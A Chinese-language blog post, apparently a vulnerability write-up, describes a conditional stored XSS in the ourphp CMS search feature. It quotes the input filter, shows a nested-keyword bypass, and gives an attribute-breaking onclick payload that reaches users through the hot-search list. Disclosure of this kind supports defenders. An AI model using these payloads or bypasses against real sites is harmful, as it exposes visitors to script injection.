ourphp全版本有条件存储型XSS

发表于 | 分类于 | | 阅读次数

暑假太闲了,网上找了一个cms我们来看看,影响其实不大(前台getshell这种的对于较大的CMS实在挖不到啊)所以各位客观就当个甜点小食看看就好

问题出在/function/ourphp_search.class.php

废话不多说,直接看关键代码

1
2
3
4
5
6
$content = dowith_sql($_REQUEST['content']);
$sid = dowith_sql($_REQUEST['sid']);
$lang = dowith_sql($_REQUEST['lang']);
$inputno = $ourphp_adminfont['inputno'];
$strlength = $ourphp_adminfont['strlength'];
$type = dowith_sql($_REQUEST['type']);

这里我们我们的输入经过一个叫做dowith_sql的函数过滤

那果断跟进去瞅瞅 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
function dowith_sql($ourphpstr){
   $ourphpstr = addslashes($ourphpstr);
   $ourphpstr = str_ireplace(" and ","",$ourphpstr);
   $ourphpstr = str_ireplace(" or ","",$ourphpstr);
   $ourphpstr = str_ireplace("execute","",$ourphpstr);
   $ourphpstr = str_ireplace("update","",$ourphpstr);
   $ourphpstr = str_ireplace("count","",$ourphpstr);
   $ourphpstr = str_ireplace("chr","",$ourphpstr);
   $ourphpstr = str_ireplace("truncate","",$ourphpstr);
   $ourphpstr = str_ireplace("char","",$ourphpstr);
   $ourphpstr = str_ireplace("declare","",$ourphpstr);
   $ourphpstr = str_ireplace("select","",$ourphpstr);
   $ourphpstr = str_ireplace("create","",$ourphpstr);
   $ourphpstr = str_ireplace("delete","",$ourphpstr);
   $ourphpstr = str_ireplace("insert","",$ourphpstr);
   $ourphpstr = str_ireplace("limit","",$ourphpstr);
   $ourphpstr = str_ireplace("extractvalue","",$ourphpstr);
   $ourphpstr = str_ireplace("concat","",$ourphpstr);
   $ourphpstr = str_ireplace("&&","",$ourphpstr);
   $ourphpstr = str_ireplace("||","",$ourphpstr);
   $ourphpstr = str_ireplace("<script","",$ourphpstr);
   $ourphpstr = str_ireplace("<iframe","",$ourphpstr);
   $ourphpstr = str_ireplace("<embed","",$ourphpstr);
   $ourphpstr = str_ireplace("*","",$ourphpstr);
   $ourphpstr = str_ireplace("#","",$ourphpstr);
   $ourphpstr = str_ireplace("'","",$ourphpstr);
   $ourphpstr = str_ireplace("<","&lt;",$ourphpstr);
   $ourphpstr = str_ireplace(">","&gt;",$ourphpstr);
   $ourphpstr = str_ireplace("&","&amp;",$ourphpstr);
   return $ourphpstr;
}

看到这里我相信各位玩过CTF的大牛一眼就能看出来了,虽然把什么select替换为空但是可以绕过

1
seselectlect

不过’也过滤了这就比较尴尬了,不过今天我们不讨论注入
我们看到是对<>进行了过滤,看似没有办法进行我们的xss,但是我们先看看输出点再说

我们在输入框里输入test然后查看一下元素

这里我们发现我们的payload出现在a标签的属性里,那么就可以绕过<>的过滤了

我们输入

1
" onclick="alert(1)" "

构造如下payload

1
<a href="search.php?cn-&content=" onclick="alert(1)" "&lang=cn&sid=product">test</a>

这里虽然有条件(多次提交弄到热门搜索),因为毕竟是热门搜索,所以一般用户点击的几率比较大,所以危害还是比较大的